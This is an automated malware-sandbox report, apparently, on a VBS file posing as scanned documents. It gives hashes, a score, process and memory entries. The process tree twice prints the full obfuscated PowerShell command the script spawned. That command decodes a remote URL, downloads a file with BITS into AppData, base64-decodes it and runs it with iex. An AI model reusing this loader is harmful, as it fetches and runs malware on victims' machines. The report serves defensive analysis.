Overview

overview

3

Static

static

1

Scanned_Do...kn.vbs

windows7-x64

3

Scanned_Do...kn.vbs

windows10-2004-x64

3

Analysis

  • max time kernel
    12s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/01/2024, 09:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Scanned_Documents_export-039383-Tiltrkn.vbs

  • Size

    87KB

  • MD5

    90c81c7b6a37d8782b4ff746a92d7fb7

  • SHA1

    ff833ab8e01056a0ba0eb119d131d1c5f14b0433

  • SHA256

    2840634c77fdc0d8ea594db41eb8b6d2d18edc86eb723acebaf8d3a99b92aa4f

  • SHA512

    6421cceb8c33064b181a0ea31f9238f541ed77e064680654fc999024fb88d83aff883e5f409767785bd8a1f9d63c5bd68070977db44f8b178ee7259de7f12635

  • SSDEEP

    1536:1cCkoSdF1qEVoe+kZxsLFxSMsfwQjXA58dTjvboqVeG8X+755c:1cCkoSdFPJ+W6F8wk68lvEqV78A5c

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Scanned_Documents_export-039383-Tiltrkn.vbs"
    1⤵
      PID:3656
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "dir;Function Tilgge9 ($Middeltem){$Chau=5;$Chau++;For($Pressi=5; $Pressi -lt $Middeltem.Length-1; $Pressi+=$Chau){$Frans = 'sub' + 'string';$Androcrat=$Middeltem.$Frans.Invoke($Pressi, 1);$Impet4=$Impet4+$Androcrat}$Impet4;}$Shelderb=Tilgge9 'SubgrhBarbitKarrot BeskpFedts:Amino/Overd/ Ophj8Afski7Prest. Retr1Blanc2 Kidn1Taftd. Holg8Roman7spuyt.Lakfe4Velam4Afhvl/Barrau ridddFeramsKongetByplayApposk SparnLauny.SimonfFotodlCaelia Data ';$Impet401=Tilgge9 'gradeiNatugeRaadsx Punt ';$Fundam = Tilgge9 'Yadav\AcupusFligly SgepsNeksbwRoseno BodnwStibb6Domfl4Emneo\JordeW speciLymphnOctavdSternoSagatw SpirsBedstP UinaoUdskiwstyree UnnarOveraSReserhMilite FronlThomalLorgn\Indisv Uned1 Gnos. Eksp0Diora\MellipDdspao NogewWadiaeUnsocr VasisStamthRupieeholotlrecarlTvivl.DdganeOphavxErhvee Foge ';&($Impet401) (Tilgge9 'Thorm$OrdriHpneumaJustenResetdSassoeDiscoltillasMisplmBuddh2bagpr=Jrgas$AandeeConsin DrmmvRamsh:FlerdwMatteiBiconnSeknidsemiviPanterFejri ') ;&($Impet401) (Tilgge9 'Moust$NegatFMobcauFllesnAfvnnd Trkfa HomemBalan=Spelt$ IndrHForsbaBeanynSulfod TilheOpspilPurses HostmForja2 Cori+Cutle$TreacF FornuRepacnRrfledDelngaDermomProsl ') ;&($Impet401) (Tilgge9 ' Tran$ KateRFljlse GruncIsbaatUnderiMeanit TooluBoast Beva= Beso Facet( Lege(GrahagBufidw MartmGgensi Hype KbestwEucaliGonian Luci3ename2Fordr_FredapBetrarAmabeoBilagcForbieChymisCatbos Nugl Sidew-BadarFReiss KapacPUrugurEksamo Recoc KaraeAaleksDentisUncoiIMugwudIblan=Gluko$Kroms{FornuPStaalIFlyttD Kvin}Soupc) Hand.afsniCRahisoSkylimseriamBibblamilienSpreddvalgpLPastriAutocnMononeadder)Lapar Deni- Caras ShodpUnderlbakskiIsodit Gumm Hands[RectocPupilhEnsilaSyvkarGemme]Bomme3 Flik4Disme ');&($Impet401) (Tilgge9 'Forhr$SondrSUdsputGlyptyIsomer StaliKommenOrthogHaemasOplangfrekv Koben=Klkke Washi$ JugoRScenee MonsclyttetImpudiSynthtInteruCarla[Medic$ HalsREmpireenergc TractWaleriRufustKornfuLoppe.CiffecStemmo Cretu PragnHrevrtWinni- Trit2Onloo]Kikse ');&($Impet401) (Tilgge9 'Chlor$UnderMHazinaMistatGasbrtLbern=Dipol(SucroTSedimeintersUntrutLanca- UncoP Uncoa JuditFlotih mose Huspr$EnergFSilicuTransnStevedCotinaRigmamKutch)Citua Respi- BircAEssennArrivdSalme Nasts(Oater[VddelISamfun Postt ManePRallet ElefrBygsk]bille:Stoof:GibblsStrafiSmectzJurateIdiod Fresh-BistaeBothyqMouss Telep8 Tele)Gomar ') ;if ($Matt) {.$Fundam $Styringsg;} else {;$Impet400=Tilgge9 ' FartSCarcetHeftia OranrPreprtGypsy-PurkeBSmileiparaktWoches NonaTBrandr SedaaAlertnMarkesDelikfForaneBovnerInflu Samvi-SaturSErhveoCustouAdresrArmagcCocheeDemis Kodif$GifteSPapnshKegleeSulfalStatidTavereSkrmpr CombbShagr Bordh- LageDGenneeStupesReklat BraciBrusknNondea StuftHuseriFerieoboulenJvnen Lydbi$TrondH OpfoaKappenLippidradikePreaclTabposFrtidmbrevi2Halml ';&($Impet401) (Tilgge9 'First$UdtmnHStnkpa OutgnElskedSuppeeFdrenl PedasCelommBoghv2Skyde= Tran$KlenfeCurtknLejesv Vens:SavouaAnimepArbejpHundedSkyllaCampdtPhotoaDrypt ') ;&($Impet401) (Tilgge9 'AppalIPrussmBaillpResuroAngiorSubhatHusbo-DiffeMTotaloJoggedOpticuUnbaplGomphe Unwi toweBAerosiUbehjtHoldjsRingeTStatirArbejaFluegn BenfsHldetfUnadjeIncoer Lugt ') ;$Handelsm2=$Handelsm2+'\boplskommu.Bri';while (-not $Hound) {&($Impet401) (Tilgge9 'Visen$BladeHKommioKormauCogenn datadUnshe=Decen(mentoTLastneBisonsSillitCodei-MercePByplaaTrillt MenthHande Rosen$ BereHHuckcaBrandn FlytdNonbre IntelReroos Ekahm Esti2 Buts) Zool ') ;&($Impet401) $Impet400;&($Impet401) (Tilgge9 'FooliSMillitOvereaRekomrSigbetCentr-DatafS apprl EspaeBrneheSmallp Tono Udgan5Rieve ');}&($Impet401) (Tilgge9 'Cruet$RigsmT UdskiServilFelongFieang Tyvaepenol Elem= Intr BedcG ChroeInvultOrogr-SulfaCHarpeo SkaenPredot CoupeLandsnInhabtAcros Total$SvaneHCarolaFolkenFarfadPronoeOverglstilesBottimVoldt2Inone ');&($Impet401) (Tilgge9 'Toron$KirkeL LinjestavstRhytif fond Osmat=fuchs Karen[unsusSBtteryBillesProfitToucheVerdemIsthm. DihyCArkiboWiedsnRegenvPrinte RockrSymfot Mave]Stona:Benzo: ChewFOversrKaprioIsabem PapeBConseaIntersSkidteBesty6tnnon4samstSProcetArethrliminiPhotonFedesgUnboi( Mvfr$ StraTTeethiHovedlDekligCrenegExtereAkkur) Afma ');&($Impet401) (Tilgge9 ' Dete$ toucIBuffemOpaleptraiteHalvktBleci4Uforb2Coarb Bdesy= Knal Supe[BehooSrmegayStangssemivtLeveneUrettmLatin. GraaTMjepsePreusxhonnit Nige.BoltsEBawblnEmpatcTeachoDeodadsprogiBigginFortygAmeri] Bold:Overs:AreolADecolSTndemCMaskeIconspIInkno.PhilaGTsende Lixit AbanSOpdrat SeleraftegiHundenDimetg Beva(Fusle$UniveLUninfemainptrepubfFluxp)Photo ');&($Impet401) (Tilgge9 ' Sild$SisusS MeditoffseeAneurd DistbSpher=Misar$ChickI Ringm Sealp Passe HacktPseud4Vomit2Nigge.BiotrsSpermuRoundbparabsGennetVenenrPredeiBefran VddegLiche(Momen2Reinj4Skrid7Fjrte3Snapp4Balan6Kirke,Sprog1 Auxo9Behnd8Stori2kompo3Ringk)armou ');&($Impet401) $Stedb;}"
        2⤵
          PID:3004
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "dir;Function Tilgge9 ($Middeltem){$Chau=5;$Chau++;For($Pressi=5; $Pressi -lt $Middeltem.Length-1; $Pressi+=$Chau){$Frans = 'sub' + 'string';$Androcrat=$Middeltem.$Frans.Invoke($Pressi, 1);$Impet4=$Impet4+$Androcrat}$Impet4;}$Shelderb=Tilgge9 'SubgrhBarbitKarrot BeskpFedts:Amino/Overd/ Ophj8Afski7Prest. Retr1Blanc2 Kidn1Taftd. Holg8Roman7spuyt.Lakfe4Velam4Afhvl/Barrau ridddFeramsKongetByplayApposk SparnLauny.SimonfFotodlCaelia Data ';$Impet401=Tilgge9 'gradeiNatugeRaadsx Punt ';$Fundam = Tilgge9 'Yadav\AcupusFligly SgepsNeksbwRoseno BodnwStibb6Domfl4Emneo\JordeW speciLymphnOctavdSternoSagatw SpirsBedstP UinaoUdskiwstyree UnnarOveraSReserhMilite FronlThomalLorgn\Indisv Uned1 Gnos. Eksp0Diora\MellipDdspao NogewWadiaeUnsocr VasisStamthRupieeholotlrecarlTvivl.DdganeOphavxErhvee Foge ';&($Impet401) (Tilgge9 'Thorm$OrdriHpneumaJustenResetdSassoeDiscoltillasMisplmBuddh2bagpr=Jrgas$AandeeConsin DrmmvRamsh:FlerdwMatteiBiconnSeknidsemiviPanterFejri ') ;&($Impet401) (Tilgge9 'Moust$NegatFMobcauFllesnAfvnnd Trkfa HomemBalan=Spelt$ IndrHForsbaBeanynSulfod TilheOpspilPurses HostmForja2 Cori+Cutle$TreacF FornuRepacnRrfledDelngaDermomProsl ') ;&($Impet401) (Tilgge9 ' Tran$ KateRFljlse GruncIsbaatUnderiMeanit TooluBoast Beva= Beso Facet( Lege(GrahagBufidw MartmGgensi Hype KbestwEucaliGonian Luci3ename2Fordr_FredapBetrarAmabeoBilagcForbieChymisCatbos Nugl Sidew-BadarFReiss KapacPUrugurEksamo Recoc KaraeAaleksDentisUncoiIMugwudIblan=Gluko$Kroms{FornuPStaalIFlyttD Kvin}Soupc) Hand.afsniCRahisoSkylimseriamBibblamilienSpreddvalgpLPastriAutocnMononeadder)Lapar Deni- Caras ShodpUnderlbakskiIsodit Gumm Hands[RectocPupilhEnsilaSyvkarGemme]Bomme3 Flik4Disme ');&($Impet401) (Tilgge9 'Forhr$SondrSUdsputGlyptyIsomer StaliKommenOrthogHaemasOplangfrekv Koben=Klkke Washi$ JugoRScenee MonsclyttetImpudiSynthtInteruCarla[Medic$ HalsREmpireenergc TractWaleriRufustKornfuLoppe.CiffecStemmo Cretu PragnHrevrtWinni- Trit2Onloo]Kikse ');&($Impet401) (Tilgge9 'Chlor$UnderMHazinaMistatGasbrtLbern=Dipol(SucroTSedimeintersUntrutLanca- UncoP Uncoa JuditFlotih mose Huspr$EnergFSilicuTransnStevedCotinaRigmamKutch)Citua Respi- BircAEssennArrivdSalme Nasts(Oater[VddelISamfun Postt ManePRallet ElefrBygsk]bille:Stoof:GibblsStrafiSmectzJurateIdiod Fresh-BistaeBothyqMouss Telep8 Tele)Gomar ') ;if ($Matt) {.$Fundam $Styringsg;} else {;$Impet400=Tilgge9 ' FartSCarcetHeftia OranrPreprtGypsy-PurkeBSmileiparaktWoches NonaTBrandr SedaaAlertnMarkesDelikfForaneBovnerInflu Samvi-SaturSErhveoCustouAdresrArmagcCocheeDemis Kodif$GifteSPapnshKegleeSulfalStatidTavereSkrmpr CombbShagr Bordh- LageDGenneeStupesReklat BraciBrusknNondea StuftHuseriFerieoboulenJvnen Lydbi$TrondH OpfoaKappenLippidradikePreaclTabposFrtidmbrevi2Halml ';&($Impet401) (Tilgge9 'First$UdtmnHStnkpa OutgnElskedSuppeeFdrenl PedasCelommBoghv2Skyde= Tran$KlenfeCurtknLejesv Vens:SavouaAnimepArbejpHundedSkyllaCampdtPhotoaDrypt ') ;&($Impet401) (Tilgge9 'AppalIPrussmBaillpResuroAngiorSubhatHusbo-DiffeMTotaloJoggedOpticuUnbaplGomphe Unwi toweBAerosiUbehjtHoldjsRingeTStatirArbejaFluegn BenfsHldetfUnadjeIncoer Lugt ') ;$Handelsm2=$Handelsm2+'\boplskommu.Bri';while (-not $Hound) {&($Impet401) (Tilgge9 'Visen$BladeHKommioKormauCogenn datadUnshe=Decen(mentoTLastneBisonsSillitCodei-MercePByplaaTrillt MenthHande Rosen$ BereHHuckcaBrandn FlytdNonbre IntelReroos Ekahm Esti2 Buts) Zool ') ;&($Impet401) $Impet400;&($Impet401) (Tilgge9 'FooliSMillitOvereaRekomrSigbetCentr-DatafS apprl EspaeBrneheSmallp Tono Udgan5Rieve ');}&($Impet401) (Tilgge9 'Cruet$RigsmT UdskiServilFelongFieang Tyvaepenol Elem= Intr BedcG ChroeInvultOrogr-SulfaCHarpeo SkaenPredot CoupeLandsnInhabtAcros Total$SvaneHCarolaFolkenFarfadPronoeOverglstilesBottimVoldt2Inone ');&($Impet401) (Tilgge9 'Toron$KirkeL LinjestavstRhytif fond Osmat=fuchs Karen[unsusSBtteryBillesProfitToucheVerdemIsthm. DihyCArkiboWiedsnRegenvPrinte RockrSymfot Mave]Stona:Benzo: ChewFOversrKaprioIsabem PapeBConseaIntersSkidteBesty6tnnon4samstSProcetArethrliminiPhotonFedesgUnboi( Mvfr$ StraTTeethiHovedlDekligCrenegExtereAkkur) Afma ');&($Impet401) (Tilgge9 ' Dete$ toucIBuffemOpaleptraiteHalvktBleci4Uforb2Coarb Bdesy= Knal Supe[BehooSrmegayStangssemivtLeveneUrettmLatin. GraaTMjepsePreusxhonnit Nige.BoltsEBawblnEmpatcTeachoDeodadsprogiBigginFortygAmeri] Bold:Overs:AreolADecolSTndemCMaskeIconspIInkno.PhilaGTsende Lixit AbanSOpdrat SeleraftegiHundenDimetg Beva(Fusle$UniveLUninfemainptrepubfFluxp)Photo ');&($Impet401) (Tilgge9 ' Sild$SisusS MeditoffseeAneurd DistbSpher=Misar$ChickI Ringm Sealp Passe HacktPseud4Vomit2Nigge.BiotrsSpermuRoundbparabsGennetVenenrPredeiBefran VddegLiche(Momen2Reinj4Skrid7Fjrte3Snapp4Balan6Kirke,Sprog1 Auxo9Behnd8Stori2kompo3Ringk)armou ');&($Impet401) $Stedb;}"
            3⤵
              PID:3160
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 2300
                4⤵
                • Program crash
                PID:4924
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3160 -ip 3160
          1⤵
            PID:1200

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qlojub2z.m3g.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • memory/3004-2-0x00000208AEC00000-0x00000208AEC22000-memory.dmp

            Filesize

            136KB

            Download

          • memory/3004-10-0x00007FFBC9100000-0x00007FFBC9BC1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3004-12-0x00000208ACA30000-0x00000208ACA40000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3004-11-0x00000208ACA30000-0x00000208ACA40000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3004-13-0x00000208ACA30000-0x00000208ACA40000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3004-44-0x00007FFBC9100000-0x00007FFBC9BC1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3160-20-0x0000000005540000-0x00000000055A6000-memory.dmp

            Filesize

            408KB

            Download

          • memory/3160-33-0x0000000005C50000-0x0000000005C9C000-memory.dmp

            Filesize

            304KB

            Download

          • memory/3160-16-0x0000000002310000-0x0000000002320000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3160-14-0x0000000004670000-0x00000000046A6000-memory.dmp

            Filesize

            216KB

            Download

          • memory/3160-19-0x0000000004C40000-0x0000000004C62000-memory.dmp

            Filesize

            136KB

            Download

          • memory/3160-17-0x0000000002310000-0x0000000002320000-memory.dmp

            Filesize

            64KB

            Download

          • memory/3160-21-0x00000000055B0000-0x0000000005616000-memory.dmp

            Filesize

            408KB

            Download

          • memory/3160-31-0x0000000005820000-0x0000000005B74000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/3160-32-0x0000000005C00000-0x0000000005C1E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/3160-18-0x0000000004CE0000-0x0000000005308000-memory.dmp

            Filesize

            6.2MB

            Download

          • memory/3160-34-0x0000000006BC0000-0x0000000006C56000-memory.dmp

            Filesize

            600KB

            Download

          • memory/3160-36-0x0000000006190000-0x00000000061B2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/3160-37-0x0000000007480000-0x0000000007A24000-memory.dmp

            Filesize

            5.6MB

            Download

          • memory/3160-35-0x0000000006140000-0x000000000615A000-memory.dmp

            Filesize

            104KB

            Download

          • memory/3160-38-0x00000000080B0000-0x000000000872A000-memory.dmp

            Filesize

            6.5MB

            Download

          • memory/3160-39-0x0000000007220000-0x0000000007242000-memory.dmp

            Filesize

            136KB

            Download

          • memory/3160-40-0x00000000072A0000-0x00000000072B4000-memory.dmp

            Filesize

            80KB

            Download

          • memory/3160-41-0x0000000074CA0000-0x0000000075450000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/3160-15-0x0000000074CA0000-0x0000000075450000-memory.dmp

            Filesize

            7.7MB

            Download